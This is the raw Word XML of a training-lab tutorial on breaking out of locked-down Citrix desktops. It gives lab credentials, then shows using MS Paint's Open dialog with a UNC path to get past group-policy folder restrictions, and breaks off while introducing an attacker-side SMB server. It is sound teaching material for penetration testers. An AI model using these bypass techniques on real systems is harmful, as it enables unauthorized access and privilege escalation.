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2B49" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC9">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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Citrix Breakout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A6397"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7EAF8355">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B6A0D"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Numerous organizations leverage virtualization platforms such as Terminal Services, Citrix, AWS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AppStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, CyberArk PSM and Kiosk to offer remote access solutions in order to meet their business requirements. However, in most organizations "lock-down" measures are implemented in their desktop environments to minimize the potential impact of malicious staff members and compromised accounts on overall domain security. While these desktop restrictions can impede threat actors, there remains a possibility for them to "break-out" of the restricted environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E405888"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2E4E4F23">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55910AC8"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Basic Methodology for break-out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38578F65" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Gain access to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Dialog Box</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1224EF62" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Exploit the Dialog Box to achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>command execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E004657" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Escalate privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain higher levels of access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9732DF"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0D3EC3EA">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528788DA"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In certain environments, where minimal hardening measures are implemented, there might even be a standard shortcut to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Start Menu, potentially aiding in unauthorized access. However, in a highly restrictive </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>lock-down</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment, any attempts to locate "cmd.exe" or "powershell.exe" in the start menu will yield no results. Similarly, accessing </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>C:\Windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> through File Explorer will trigger an error, preventing direct access to critical system utilities. Acquiring access to the "CMD/Command Prompt" in such a restricted environment represents a notable achievement, as it provides extensive control over the Operating System. This level of control empowers an attacker to gather valuable information, facilitating the further escalation of privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3499E5FE"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There are many techniques which can be used for breaking out of a Citrix environment. This section will not cover every possible scenario, but we will walk through the most common ways to perform a Citrix breakout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19101A"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Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://humongousretail.com/remote/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the RDP session of the spawned target and login with the provided credentials below. After login, click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Default Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain the Citrix </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>launch.ica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in order to connect to the restricted environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8B6C38"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Code: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>citrixcredentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32C371B8"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Username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pmorgan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EEE5D5D"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Password: Summer1Summer!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69807121"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  Domain: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>htb.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F80EF9A"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3BEEA573">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074E760"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t>Bypassing Path Restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD0E3C"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">When we attempt to visit </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>C:\Users</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> using File Explorer, we find it is restricted and results in an error. This indicates that group policy has been implemented to restrict users from browsing directories in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>C:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> drive using File Explorer. In such scenarios, it is possible to utilize windows dialog boxes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>as a means to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypass the restrictions imposed by group policy. Once a Windows dialog box is obtained, the next step often involves navigating to a folder path containing native executables that offer interactive console access (i.e.: cmd.exe). Usually, we have the option to directly enter the folder path into the file name field to gain access to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E781520" w14:textId="50F9BB9D"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4D4E0485" wp14:editId="6E83EEE6">
            <wp:extent cx="2832238" cy="2249536"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1413738403"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1864" cy="2273067"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF33E2"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Numerous desktop applications deployed via Citrix are equipped with functionalities that enable them to interact with files on the operating system. Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print, usually provide an attacker with an opportunity to invoke a Windows dialog box. There are multiple ways to open dialog box in windows using tools such as Paint, Notepad, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Wordpad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc. We will cover using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>MS Paint</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an example for this section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0634FA"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Run </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Paint</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> from start menu and click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>File &gt; Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to open the Dialog Box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B266B" w14:textId="4EEA8106"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451030B1" wp14:editId="67B4C9EC">
            <wp:extent cx="2741568" cy="2176609"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1020717960"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4549" cy="2186915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DE1A4"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With the windows dialog box open for paint, we can enter the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="unc-paths" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>UNC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> path </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\\127.0.0.1\c$\users\pmorgan</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> under the File name field, with File-Type set to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>All Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and upon hitting enter we gain access to the desired directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54761357" w14:textId="1DF4316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1928CFFE" wp14:editId="157F1155">
            <wp:extent cx="3169546" cy="2174717"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2017664748"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6470" cy="2186329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D0C460"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4DC00702">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A738F"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t>Accessing SMB share from restricted environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000293D"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Having restrictions set, File Explorer does not allow direct access to SMB shares on attacker machine. However, by utilizing the UNC path within the Windows dialog box, it's possible to circumvent this limitation. This approach can be employed to facilitate file transfers from a different computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313ADF67"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Start a SMB server from the attacker machine using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Impacket's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>smbserver.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
